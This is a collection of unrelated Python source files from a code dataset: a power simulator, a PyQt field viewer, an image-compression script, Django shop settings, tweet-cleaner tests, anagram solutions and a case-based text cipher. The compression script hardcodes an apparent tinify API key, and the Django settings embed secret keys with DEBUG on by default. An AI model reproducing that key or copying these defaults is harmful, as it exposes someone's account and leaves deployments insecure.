trailing return (\\n), split into list using\n # \"\\t\" as the split pattern\n line = line.split()\n # use first item in list for the key, join remaining list items\n # with \", \" for the value.\n read_device_map[(line[0])] = \", \".join(line[1:]) #example parser cose, but this does not format correctly\n\n \n return read_integration_period, read_device_map\n\n \ndef parse_inputstring(device, state, device_map, i_string:str, to_write:list)->list:\n '''an input string is a string of 1s and 0s that represent whether or not the device,state is on at\n a given time interval\n '''\n assert(len(to_write) == len(i_string))\n for i in range(len(i_string)):\n inst_st = int(i_string[i])\n if inst_st == 1:\n assert(to_write[i] == 0) # assert that to_write is already empty\n to_write[i] += int(inst_st)* device_map[device][state]\n \n return to_write\n\ndef parse_inputfile(file, device_map)-> dict:\n '''parses the device input file which is a csv file with format\n device, state, on/off string\n \n on/off string denotes with a 1 or a 0 whether or not a device is on during that time\n '''\n to_return = {}\n \n with open(file, 'r') as i_file:\n for line in i_file:\n if line[:11] == 'sample_rate':\n pass #lol beautiful code right here ima keep this for kicks\n else:\n info = line.rstrip().split(',')\n device, state, i_string = info[0], info[1], info[2]\n \n if(not device in to_return):\n to_return[device] = make_int_array(len(i_string))\n \n parse_inputstring(device, state, device_map, i_string, to_return[device])\n \n return to_return\n\ndef mapval_to_matrix(map: dict)->list:\n\n # maybe do some error checking here?\n \n return list(map.values())\n \n \n \nif __name__ == '__main__':\n # rudimentary testing\n \n # test flatten_cols\n assert(flatten_cols([[1,3,4],\n [2,3,4],\n [5,6,7]]) == [8,12,15])\n \n # test parse_input_srting\n power_array = [0,0,0,0,0,0,0,0,0,0]\n dev_map = {'television': {'on':100, 'off':0, 'standby':25}, 'xbox': {'on':70, 'off':0, 'standby':20}}\n input_str_tv = '1110000111'\n input_str_stndby = '0001111000'\n \n parse_inputstring('television', 'on', dev_map, input_str_tv, power_array)\n parse_inputstring('television', 'standby', dev_map, input_str_stndby, power_array)\n assert(power_array == [100, 100, 100, 25, 25, 25, 25, 100, 100, 100])\n print(energy_used(power_array, 1800))\n print(make_integral_array(power_array, 1800))\n \n # test parse_inputfile\n \n #d = parse_inputfile('test_input.csv', dev_map)\n #print(d)\n \n ","repo_name":"CalPlug/PlugLoadSimulator","sub_path":"PLSIMPriorVersions/plugloadsimDefault/device_sim.py","file_name":"device_sim.py","file_ext":"py","file_size_in_byte":7738,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"23072905541","text":"import os\nimport numpy as np\nimport pandas as pd\nimport matplotlib\nfrom matplotlib.backends.backend_qt5agg import (FigureCanvasQTAgg, NavigationToolbar2QT)\nfrom matplotlib.figure import Figure\nfrom PyQt5 import QtCore, QtGui, QtWidgets \nfrom scipy import ndimage\n\nclass fieldViewer():\n def __init__(self, _parent, _widget):\n self.parent = _parent\n self.m_widget = _widget\n self.filepaths = None\n self.loaded = False\n\n self.m_widget.setMinimumSize(QtCore.QSize(350, 350))\n\n # a figure instance to plot on\n self.figure = Figure(figsize=(3,4))\n\n # this is the Canvas widget that displays the 'figure'\n self.canvas = FigureCanvasQTAgg(self.figure)\n # self.figure.set_cmap('viridis') # 'gray' # magma, seismic\n\n # this is the Navigation widget - toolbar for image\n self.toolbar = NavigationToolbar2QT(self.canvas, self.parent)\n\n # these are the app widgets connected to their slot methods\n titleFont=QtGui.QFont(\"Arial\",15)\n titleFont.setBold(True)\n self.titleLabel = QtWidgets.QLabel('Internal field')\n self.titleLabel.setFont(titleFont)\n self.titleLabel.setAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter) \n self.slideBar = QtWidgets.QSlider(QtCore.Qt.Horizontal)\n self.slideBar.setMinimum(0)\n self.slideBar.setTickPosition(QtWidgets.QSlider.TicksBothSides)\n self.slideBar.setTickInterval(1) \n self.slideBar.setSingleStep(1)\n self.slideBar.setEnabled(False)\n self.slideBar.valueChanged[int].connect(self.changeValue)\n self.buttonPlus = QtWidgets.QPushButton('+')\n self.buttonPlus.setMaximumSize(QtCore.QSize(25, 30))\n self.buttonPlus.setEnabled(False)\n self.buttonPlus.clicked.connect(self.slideMoveUp)\n self.buttonMinus = QtWidgets.QPushButton('-')\n self.buttonMinus.setMaximumSize(QtCore.QSize(25, 30))\n self.buttonMinus.setEnabled(False) \n self.buttonMinus.clicked.connect(self.slideMoveDown) \n self.buttonSave = QtWidgets.QPushButton('Save')\n self.buttonSave.setMinimumSize(QtCore.QSize(50, 40))\n self.buttonSave.setEnabled(False)\n self.buttonSave.clicked.connect(self.saveData)\n self.vizBox = QtWidgets.QComboBox()\n self.vizBox.addItems(['field', 'gradients', 'distribution', 'meangrads'])\n self.vizBox.setEnabled(False) \n self.maskBox = QtWidgets.QComboBox()\n self.maskBox.addItems(['pore', 'grain', 'all'])\n self.maskBox.setEnabled(False)\n self.buttonViz = QtWidgets.QPushButton('View')\n self.buttonViz.setMinimumSize(QtCore.QSize(50, 40))\n self.buttonViz.setEnabled(False)\n self.buttonViz.clicked.connect(self.changeDataViz)\n self.labelDimensions = QtWidgets.QLabel('[h=0,w=0]')\n self.labelSliceId = QtWidgets.QLabel('Slice = 0')\n self.labelSliceId.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)\n\n # set the layouts\n mainLayout = QtWidgets.QVBoxLayout(self.m_widget)\n mainLayout.addWidget(self.titleLabel)\n mainLayout.addWidget(self.toolbar)\n layoutH2 = QtWidgets.QHBoxLayout()\n layoutH3 = QtWidgets.QHBoxLayout()\n layoutH4 = QtWidgets.QHBoxLayout() \n layoutH2.addWidget(self.buttonMinus) \n layoutH2.addWidget(self.slideBar) \n layoutH2.addWidget(self.buttonPlus) \n layoutH3.addWidget(self.labelDimensions)\n layoutH3.addItem(QtWidgets.QSpacerItem(15, 15, QtWidgets.QSizePolicy.MinimumExpanding))\n layoutH3.addWidget(self.buttonSave)\n layoutH3.addItem(QtWidgets.QSpacerItem(15, 15, QtWidgets.QSizePolicy.MinimumExpanding))\n layoutH3.addWidget(self.labelSliceId)\n layoutH4.addWidget(self.vizBox)\n layoutH4.addWidget(self.maskBox)\n layoutH4.addWidget(self.buttonViz)\n mainLayout.addWidget(self.canvas, QtWidgets.QSizePolicy.MinimumExpanding)\n mainLayout.addLayout(layoutH2)\n mainLayout.addLayout(layoutH3) \n mainLayout.addLayout(layoutH4) \n mainLayout.setAlignment(QtCore.Qt.AlignTop) \n\n # initialize the main image data\n self.m_map = None # numpy array\n self.m_mask = None # numpy array\n self.m_data = None # numpy array\n self.m_image = None # QImage object\n self.clim = None # numpy array\n self.cmap = None # matplotlib cmap object\n self.field_data = None # numpy array\n self.field_grads = None # numpy array\n self.field_lims = None # numpy array\n self.field_dist = None # list with numpy arrays of amps, bins\n self.grads_lims = None # numpy array\n self.mean_grads = None # numpy array\n self.pore_color = 0\n\n \n def clear(self):\n self.__del__()\n\n def __del__(self):\n # remove temporary data: \n self.m_data = None\n self.m_image = None\n\n # @Slot()\n def plotImage(self, _slice):\n self.m_mask = 1\n if(self.maskBox.currentText() == 'pore'):\n self.m_mask = np.where(self.m_map[_slice] == self.pore_color, True, False)\n elif(self.maskBox.currentText() == 'grain'):\n self.m_mask = np.where(self.m_map[_slice] == self.pore_color, False, True)\n \n self.figure.clear()\n ax = self.figure.add_subplot(111)\n img = ax.imshow(self.m_mask * self.m_data[_slice] + ~self.m_mask * self.m_data.min()) #, norm=matplotlib.colors.LogNorm()) \n ax.set_xticks([])\n ax.set_yticks([]) \n img.set_cmap(self.cmap)\n # img.set_cmap('seismic') \n \n cbar = self.figure.colorbar(img, fraction=0.05, pad=0.04)\n img.set_clim(self.clim)\n \n if(self.vizBox.currentText() == 'field'):\n ax.set_title('Magnetic field')\n cbar.set_label('G')\n elif(self.vizBox.currentText() == 'gradients'):\n ax.set_title('Field gradient')\n cbar.set_label('G/cm')\n\n ax.figure.tight_layout()\n ax.figure.canvas.draw()\n\n # self.buttonPlot.setEnabled(False) \n return\n\n def plotDist(self):\n self.figure.clear()\n ax = self.figure.add_subplot(111)\n heights = self.field_dist[0]\n widths = self.field_dist[1][1:] - self.field_dist[1][:-1]\n l_edges = self.field_dist[1][:-1]\n # img = ax.bar(l_edges, heights, widths, align='edge')\n img = ax.plot(l_edges + widths*0.5, heights)\n ax.set_xscale('log')\n ax.set_xlabel('Field Gradient (G/cm)')\n ax.set_ylabel('Volume fraction')\n ax.set_ylim([0.0, 1.1*heights.max()])\n ax.figure.tight_layout()\n ax.figure.canvas.draw()\n return\n\n def plotMeanGradsPerSlice(self):\n self.figure.clear()\n ax = self.figure.add_subplot(111)\n img = ax.plot(self.mean_grads)\n ax.set_ylabel('Mean Field Gradient (G/cm)')\n ax.set_xlabel('Slice')\n ax.figure.tight_layout()\n ax.figure.canvas.draw()\n return\n\n # @Slot()\n def changeValue(self, _value):\n current_slice = _value\n self.loadImageData(current_slice, True)\n self.labelSliceId.setText(\"Slice = \"+str(_value+1)) \n return\n\n # @Slot()\n def slideMoveUp(self):\n if(self.slideBar.value() + 1 < self.field_data.shape[0]):\n self.slideBar.setValue(self.slideBar.value()+1)\n return\n\n # @Slot()\n def slideMoveDown(self):\n if(self.slideBar.value() > 0):\n self.slideBar.setValue(self.slideBar.value()-1)\n return\n\n # @Slot()\n def loadFieldViz(self):\n self.loadImageData(0, True)\n self.buttonPlus.setEnabled(True) \n self.buttonMinus.setEnabled(True) \n self.slideBar.setMaximum(self.field_data.shape[0]-1)\n self.slideBar.setValue(0)\n self.slideBar.setEnabled(True)\n self.labelSliceId.setText(\"Slice = 1\")\n self.loaded = True\n return\n\n def loadDistViz(self):\n self.buttonPlus.setEnabled(False) \n self.buttonMinus.setEnabled(False) \n self.slideBar.setMaximum(self.field_data.shape[0]-1)\n self.slideBar.setValue(0)\n self.slideBar.setEnabled(False)\n self.labelSliceId.setText(\"\")\n self.plotDist()\n self.loaded = True\n return \n\n def loadMeanGradsViz(self):\n self.buttonPlus.setEnabled(False) \n self.buttonMinus.setEnabled(False) \n self.slideBar.setMaximum(self.field_data.shape[0]-1)\n self.slideBar.setValue(0)\n self.slideBar.setEnabled(False)\n self.labelSliceId.setText(\"\")\n self.plotMeanGradsPerSlice()\n self.loaded = True\n return \n\n\n # Method\n def loadImageData(self, _slice, _updateWindow):\n if _updateWindow:\n self.labelDimensions.setText(\"[h=\"+str(self.m_data[_slice].shape[0])+\",w=\"+str(self.m_data[_slice].shape[1])+\"]\")\n self.plotImage(_slice)\n return\n\n # Method\n def changeDataViz(self):\n if(self.vizBox.currentText() == 'distribution'):\n self.loadDistViz()\n elif(self.vizBox.currentText() == 'field'):\n self.m_data = self.field_data\n self.clim = self.field_lims\n self.cmap = 'seismic'\n self.loadFieldViz()\n elif(self.vizBox.currentText() == 'gradients'):\n self.m_data = self.field_grads\n self.clim = self.grads_lims\n self.cmap = 'Reds'\n self.loadFieldViz()\n elif(self.vizBox.currentText() == 'meangrads'):\n self.loadMeanGradsViz()\n return\n \n\n # Method\n def setFieldData(self, full_img, field, grads, pore_color):\n self.pore_color = pore_color\n self.m_map = full_img\n self.field_data = field\n self.field_grads = grads\n self.field_lims = np.array([field.min(), field.max()])\n self.grads_lims = np.array([0, grads.max()])\n \n self.m_data = self.field_data\n self.clim = self.field_lims\n self.cmap = 'seismic'\n self.curr_dviztype = 'field'\n\n self.vizBox.setEnabled(True)\n self.maskBox.setEnabled(True)\n self.buttonViz.setEnabled(True)\n self.buttonSave.setEnabled(True)\n self.loadFieldViz()\n\n self.getFieldDist()\n self.getMeanGradsPerSlice()\n return\n\n # Method\n def getFieldDist(self):\n # get true points\n data = self.field_grads[self.m_map == self.pore_color]\n data = data[data > 1.e-8]\n \n max_val = np.ceil(np.log10(data.max()*1.1))\n min_val = np.floor(np.log10(data.min()*0.9))\n bins = 64\n if(max_val - min_val > 0.0):\n bins *= int(max_val - min_val) \n hbins = np.logspace(min_val, max_val, bins)\n dist = np.histogram(data, hbins, density=False)\n \n self.field_dist = []\n self.field_dist.append(1.0 / dist[0].sum() * dist[0])\n self.field_dist.append(dist[1])\n return\n\n # Method\n def getMeanGradsPerSlice(self):\n slices = self.field_grads.shape[0]\n self.mean_grads = np.zeros(slices)\n\n for i in range(slices):\n data = self.field_grads[i]\n filtered = data[self.m_map[i] == self.pore_color]\n if(filtered.size > 0):\n self.mean_grads[i] = filtered.mean()\n else:\n self.mean_grads[i] = np.nan\n\n # print(self.mean_grads)\n\n return\n\n # @Slot()\n def saveData(self):\n if(self.vizBox.currentText() == 'distribution'):\n self.saveGradsDist()\n else:\n print('save field data to be implemented')\n return\n\n def saveGradsDist(self): \n d = {'bins':self.field_dist[1][1:], 'amps':self.field_dist[0], 'csum':self.field_dist[0].cumsum()}\n df = pd.DataFrame(data=d)\n \n db_dir = os.path.join(os.path.dirname(__file__), '..', 'db')\n options = QtWidgets.QFileDialog.Options()\n filename = QtWidgets.QFileDialog.getSaveFileName(self.parent, 'Save Field Data', db_dir, \"\", options=options)\n if(filename[0] != ''):\n\n # Save dist data in CSV format\n df.to_csv(filename[0] + '.csv')\n return\n\n # @Slot()\n def saveFieldData(self):\n db_dir = os.path.join(os.path.dirname(__file__), '..', 'db')\n options = QtWidgets.QFileDialog.Options()\n filename = QtWidgets.QFileDialog.getSaveFileName(self.parent, 'Save Field Data', db_dir, \"\", options=options)\n if(filename[0] != ''):\n os.mkdir(filename[0])\n my_file = filename[0].split(os.sep)[-1]\n\n field_dims = np.array([self.field_data.shape[2],self.m_data.shape[1],self.m_data.shape[0]],dtype='int32')\n\n # Save image data in BIN format\n dims_filename = my_file + '_dimensions.bin'\n with open(os.path.join(filename[0], dims_filename), \"bw\") as file_dims:\n field_dims.tofile(file_dims)\n\n # Save image data in BIN format\n bin_filename = my_file + '.bin'\n with open(os.path.join(filename[0], bin_filename), \"bw\") as file_bin:\n self.field_data.tofile(file_bin)\n\n # Save image data in TXT format\n txt_filename = my_file + '.txt' \n with open(os.path.join(filename[0], txt_filename), \"w\") as file_txt:\n field_dims.tofile(file_txt, sep=',')\n file_txt.write('\\n')\n self.field_data.tofile(file_txt, sep=',')\n\n return\n\n\n# This function was adapted from (https://github.com/Entscheider/SeamEater/blob/master/gui/QtTool.py)\n# Project: SeamEater; Author: Entscheider; File: QtTool.py; GNU General Public License v3.0 \n# Original function name: qimage2numpy(qimg)\n# We consider just 8 bits images and convert to single depth:\ndef convertQImageToNumpy(_qimg):\n h = _qimg.height()\n w = _qimg.width()\n ow = _qimg.bytesPerLine() * 8 // _qimg.depth()\n d = 0\n if _qimg.format() in (QtGui.QImage.Format_ARGB32_Premultiplied,\n QtGui.QImage.Format_ARGB32,\n QtGui.QImage.Format_RGB32):\n d = 4 # formats: 6, 5, 4.\n elif _qimg.format() in (QtGui.QImage.Format_Indexed8,\n QtGui.QImage.Format_Grayscale8):\n d = 1 # formats: 3, 24.\n else:\n raise ValueError(\".ERROR: Unsupported QImage format!\")\n buf = _qimg.bits().asstring(_qimg.byteCount())\n res = np.frombuffer(buf, 'uint8')\n res = res.reshape((h,ow,d)).copy()\n if w != ow:\n res = res[:,:w] \n if d >= 3:\n res = res[:,:,0].copy()\n else:\n res = res[:,:,0] \n return res\n\n","repo_name":"mcastrorib/dipolar_field","sub_path":"src/fieldViewer.py","file_name":"fieldViewer.py","file_ext":"py","file_size_in_byte":14716,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26725000241","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\n\n__author__ = 'chenjunsheng'\n\nimport os\nimport os.path\nimport tinify\n\ntinify.key = \"zp8XWlmqgxODG4MLB8aO2XRO3L9BZZPO\"\n\ndef compress(path):\n\n for dir_path, dir_names, file_names in os.walk(path):\n file_names = filter(lambda file_name: file_name[-4:] == '.png', file_names)\n file_names = map(lambda file_name: os.path.join(dir_path, file_name), file_names)\n for file in file_names:\n print(file)\n source = tinify.from_file(file)\n source.to_file(file)\n\n file_names = filter(lambda file_name: file_name[-4:] == '.jpg', file_names)\n file_names = map(lambda file_name: os.path.join(dir_path, file_name), file_names)\n for file in file_names:\n print(file)\n source = tinify.from_file(file)\n source.to_file(file)\n\nif __name__ == '__main__':\n # try:\n # filenames = get_all_file_in(os.getcwd())\n # for filename in filenames:\n # print filename\n # except:\n # print \"execute list_file_dir fun error\"\n compress(os.getcwd())\n","repo_name":"ShenYuCN/WorkspacePython","sub_path":"tiny----py/tiny_original_location.py","file_name":"tiny_original_location.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4433056421","text":"import os\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\n# SECRET_KEY = '5b2%^t56sqw3tt6*c+t%#2m@+o(^2$d6^-($+2@vp(ood_u6bg'\n\nSECRET_KEY = os.environ.get('DJANGO_SECRET_KEY', 'Speccy-Rom')\n\n# SECURITY WARNING: don't run with debug turned on in production!\n# DEBUG = True\nDEBUG = bool( os.environ.get('DJANGO_DEBUG', True))\n\nALLOWED_HOSTS = ['127.0.0.1', 'testserver']\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'ckeditor',\n 'ckeditor_uploader',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'dshop.apps.DshopConfig',\n 'mptt',\n 'cart',\n 'orders',\n 'accounts',\n 'crispy_forms'\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'dip.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(BASE_DIR, 'templates')]\n ,\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'dip.context_processors.categories',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'dip.wsgi.application'\n\n# Database\n# https://docs.djangoproject.com/en/3.0/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Password validation\n# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\nAUTHENTICATION_BACKENDS = [\n 'accounts.auth_backends.UserEmailBackend',\n]\n\n# Internationalization\n# https://docs.djangoproject.com/en/3.0/topics/i18n/\n\nLANGUAGE_CODE = 'ru-ru'\n\nTIME_ZONE = 'Europe/Moscow'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.2/howto/static-files/\n\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')\nSTATICFILES_DIRS = [\n os.path.join(BASE_DIR, 'static'),\n os.path.join(BASE_DIR, 'static/img'),\n os.path.join(BASE_DIR, 'static/css'),\n os.path.join(BASE_DIR, 'static/js'),\n os.path.join(BASE_DIR, 'static/ico'),\n os.path.join(BASE_DIR, 'static/ckeditor'),\n\n\n]\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media/')\nCKEDITOR_UPLOAD_PATH = \"uploads/\"\n\nCKEDITOR_CONFIGS = {\n 'default': {\n 'toolbar': 'None'\n },\n}\n\nCART_SESSION_ID = 'cart'\n\nUSE_THOUSAND_SEPARATOR = True\n\nCRISPY_TEMPLATE_PACK = 'bootstrap4'\nLOGIN_REDIRECT_URL = '/'\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\n\n","repo_name":"Speccy-Rom/E-comerce-Django-website-","sub_path":"dip/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"42020501736","text":"import os.path\nimport shutil\nfrom pathlib import Path\n\nfrom src.utils.path_utils import iterate_recursively\n\nbase_path = ''\nin_path = ['/home/malchul/work/GAN/StyleTransferDatasetPreparation/dumped/caricature_v2/good_samples']\nout_path = '/home/malchul/work/utilites/pinterest-downloader/Caricature_merged'\n\nall_files = [os.listdir(path) for path in in_path]\ndata_files = os.listdir()\n\nout_path = Path(out_path)\nout_path.mkdir(parents=True, exist_ok=True)\nfor i, img_path in enumerate(iterate_recursively(all_files)):\n base_name = os.path.basename(img_path)\n file_id = os.path.splitext(base_name)[0].split('_')[0]\n\n shutil.copyfile(img_path, out_path / f'{i}{os.path.splitext(img_path)[-1]}')","repo_name":"MalchuL/StyleTransferDatasetPreparation","sub_path":"utils/extract_no_detected_images.py","file_name":"extract_no_detected_images.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71708796267","text":"from utils.preprocessing.text.tweet_cleaner import TweetCleaner\nfrom utils.preprocessing.text.text_cleaner import TextCleaner\nimport pytest\n\n\n@pytest.fixture\ndef tweet_cleaner():\n tweet_cleaner = TweetCleaner()\n yield tweet_cleaner\n del tweet_cleaner\n\n\ndef test_tweet_cleaner_is_inherited_from_text_cleaner():\n cleaner = TweetCleaner()\n assert isinstance(cleaner, TweetCleaner)\n assert isinstance(cleaner, TextCleaner)\n\n\ndef test_tweet_cleaner_default_atttributes(tweet_cleaner):\n assert tweet_cleaner.remove_punctuations == True\n\n\ndef test_tweet_cleaner_inherited_attributes(tweet_cleaner):\n text_cleaner = TextCleaner()\n assert tweet_cleaner.remove_punctuations == text_cleaner.remove_punctuations\n\n\ndef test_get_RT_user_id(tweet_cleaner):\n # RT format\n # RT @user_source: tweet content\n tweet = \"RT @some_user: Hello world!\"\n assert tweet_cleaner.get_RT_user(tweet) == \"@some_user\"\n\n tweet = \"RT @someuser: Hello world!\"\n assert tweet_cleaner.get_RT_user(tweet) == \"@someuser\"\n\n tweet = \"RT @someuserwithveryloiduserud: Hello world!\"\n assert tweet_cleaner.get_RT_user(tweet) == \"@someuserwithveryloiduserud\"\n\n tweet = \"RT @usr: Hello world! @userASD\"\n assert tweet_cleaner.get_RT_user(tweet) == \"@usr\"\n\n tweet = \"No user\"\n assert tweet_cleaner.get_RT_user(tweet) is None\n\n\ndef test_get_mentioned_users(tweet_cleaner):\n # included RT\n tweet = \"RT @some_user: Hello world! @userA, @userB\\n@userCwithverylongname , @usrd\"\n expected_mentioned_users = [\n \"@some_user\",\n \"@userA\",\n \"@userB\",\n \"@userCwithverylongname\",\n \"@usrd\",\n ]\n assert tweet_cleaner.get_mentioned_users(tweet) == expected_mentioned_users\n\n tweet = \"no user is mentioned\"\n assert tweet_cleaner.get_mentioned_users(tweet) is None\n\n\ndef test_replace_RT_start(tweet_cleaner):\n tweet = \"RT @some_user: Hello world! @userA\"\n expected_cleaned_tweet = \"Hello world! @userA\"\n assert tweet_cleaner._replace_RT_start(tweet) == expected_cleaned_tweet\n\n\ndef test_replace_all_users(tweet_cleaner):\n tweet = \"@userA @userB Hello World!\"\n expected_cleaned_tweet = \" Hello World!\"\n assert tweet_cleaner._replace_all_users(tweet) == expected_cleaned_tweet\n\n\ndef test_clean_method(tweet_cleaner):\n # Only tweet content\n tweet = \"RT @some_user: Hello world! @userA @userB\\n@userCwithverylongname @usrd\"\n expected_cleaned_tweet = \"Hello world!\"\n tweet_cleaner.remove_punctuations = False\n assert tweet_cleaner.remove_punctuations == False\n assert (tweet_cleaner.clean(tweet) == expected_cleaned_tweet)\n\n tweet_cleaner.remove_punctuations = True\n assert tweet_cleaner.remove_punctuations == True\n tweet = \"RT @some_user: Hello world! @userA @userB\\n@userCwithverylongname @usrd\"\n expected_cleaned_tweet = \"Hello world\"\n assert (tweet_cleaner.clean(tweet) == expected_cleaned_tweet)\n\n tweet = \"RT @some_user: https://www.youtube.com/ Hello world! by @userA\"\n expected_cleaned_tweet = \"Hello world by\"\n assert (tweet_cleaner.clean(tweet) == expected_cleaned_tweet)\n\n\ndef test_replace_child_method_with_parent_method_it_should_not_error(tweet_cleaner):\n # suppose that we don't know what class the obj. is\n # tweet cleaner should be able to substitute for text cleaner\n text_cleaner = TextCleaner()\n tweet = \"RT @some_user: https://www.youtube.com/ Hello world! by @userA\"\n text_cleaner.clean(tweet)\n tweet_cleaner.clean(tweet)\n","repo_name":"chuan-khuna/my-python-utils","sub_path":"tests/preprocessing/text/test_tweet_cleaner.py","file_name":"test_tweet_cleaner.py","file_ext":"py","file_size_in_byte":3471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16429251207","text":"# https://leetcode.com/problems/valid-anagram/\n\n# time: nlogn\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n return sorted(t) == sorted(s)\n\n# time: O(n) space: O(n)\nclass Solution2:\n def isAnagram(self, s: str, t: str) -> bool:\n # check if length is same, if not return false\n if len(s) != len(t):\n return False\n # hashMaps to store the count of the characters\n countS, countT = {}, {}\n\n # iterate through the s and t and add character as keys and number of appearance as values\n for i in range(len(s)):\n countS[s[i]] = 1 + countS.get(s[i], 0)\n countT[t[i]] = 1 + countT.get(t[i], 0)\n # compare both dict if looks the same\n return countS == countT\n\n\ndef isAnagram(s, t):\n if len(s) != len(t):\n return False\n alphaChecks = [0]*26\n for x in s:\n alphaChecks[ord(x) - 97] += 1\n \n for x in t:\n if alphaChecks[ord(x) - 97] != 0:\n alphaChecks[ord(x) - 97] -= 1\n else:\n return False\n for x in alphaChecks:\n if x > 0:\n return False \n return True","repo_name":"b0nbon1/dope-stuff","sub_path":"extras/quick-prep-75/02-valid-anagram.py","file_name":"02-valid-anagram.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"25643760219","text":"\ndef encipher(plaintext, target_text):\n\n \"\"\"\n Encipher plaintext to target text with binary 0\n as lower case and binary 1 as upper case\n \"\"\"\n\n # remove all non-alphabetic characters\n # from plaintext and convert to upper case\n plaintext = ''.join([c for c in plaintext if c.isalpha()]).upper()\n\n # get a string of 0s and 1s representing the\n # formatting of the enciphered message letters\n binary_string = _string_to_bit_pattern(plaintext)\n\n # format the target text letters as upper or lower case\n # according to the bit pattern\n enciphered = _cased_text_from_bit_pattern(target_text, binary_string)\n\n return enciphered\n\n\ndef decipher(enciphered):\n\n \"\"\"\n Decipher enciphered text assuming lower case letters\n represent binary 0 and upper case letters represent binary 1\n \"\"\"\n\n print(\"\\nDeciphering\\n===========\\n\")\n\n # remove everything except letters\n enciphered = ''.join([c for c in enciphered if c.isalpha()])\n\n length = len(enciphered)\n letter_quintet = \"\"\n bit_pattern = \"\"\n deciphered = []\n\n for i in range(0, length, 5):\n\n # grab next 5 letters\n letter_quintet = enciphered[i: i+5]\n\n # get corresponding string of 5 bits\n bit_pattern = _letter_quintet_to_bit_pattern(letter_quintet)\n\n # get letter corresponding to bit pattern\n letter = chr(int(bit_pattern, 2) + 65)\n\n print(f\"{letter_quintet} {bit_pattern} {letter}\")\n\n deciphered.append(letter)\n\n return \"\".join(deciphered)\n\n\n#------------------------------------------------------------\n# \"PRIVATE\" FUNCTIONS\n#------------------------------------------------------------\n\ndef _string_to_bit_pattern(string):\n\n \"\"\"\n Convert string of letters to string of\n corresponding 5-bit patterns\n \"\"\"\n\n binary_list = []\n bit_pattern = \"\"\n\n for letter in string:\n # get ASCII code, subtract 65 and format as 5 bit string\n bit_pattern = format(ord(letter) - 65, '05b')\n binary_list.append(bit_pattern)\n\n return \"\".join(binary_list)\n\n\ndef _cased_text_from_bit_pattern(target_text, binary_pattern):\n\n \"\"\"\n Set case of target text according to string of 5-bit patterns\n\n 0 => lower case\n 1 => upper case\n\n Non-alpha characters are skipped\n \"\"\"\n\n cased_text = []\n\n index = 0\n\n for bit in binary_pattern:\n\n while not target_text[index].isalpha():\n cased_text.append(target_text[index])\n index += 1\n\n if bit == \"0\":\n cased_text.append(target_text[index].lower())\n else:\n cased_text.append(target_text[index].upper())\n\n index += 1\n\n return \"\".join(cased_text)\n\n\ndef _letter_quintet_to_bit_pattern(letter_quintet):\n\n \"\"\"\n Convert string of 5 letters to corresponding bit pattern\n Lower case => 0\n Upper case => 1\n \"\"\"\n\n bit_pattern = []\n\n for c in letter_quintet:\n\n if(c >= \"a\" and c <= \"z\"):\n bit_pattern.append(\"0\")\n elif(c >= \"A\" and c <= \"Z\"):\n bit_pattern.append(\"1\")\n\n return 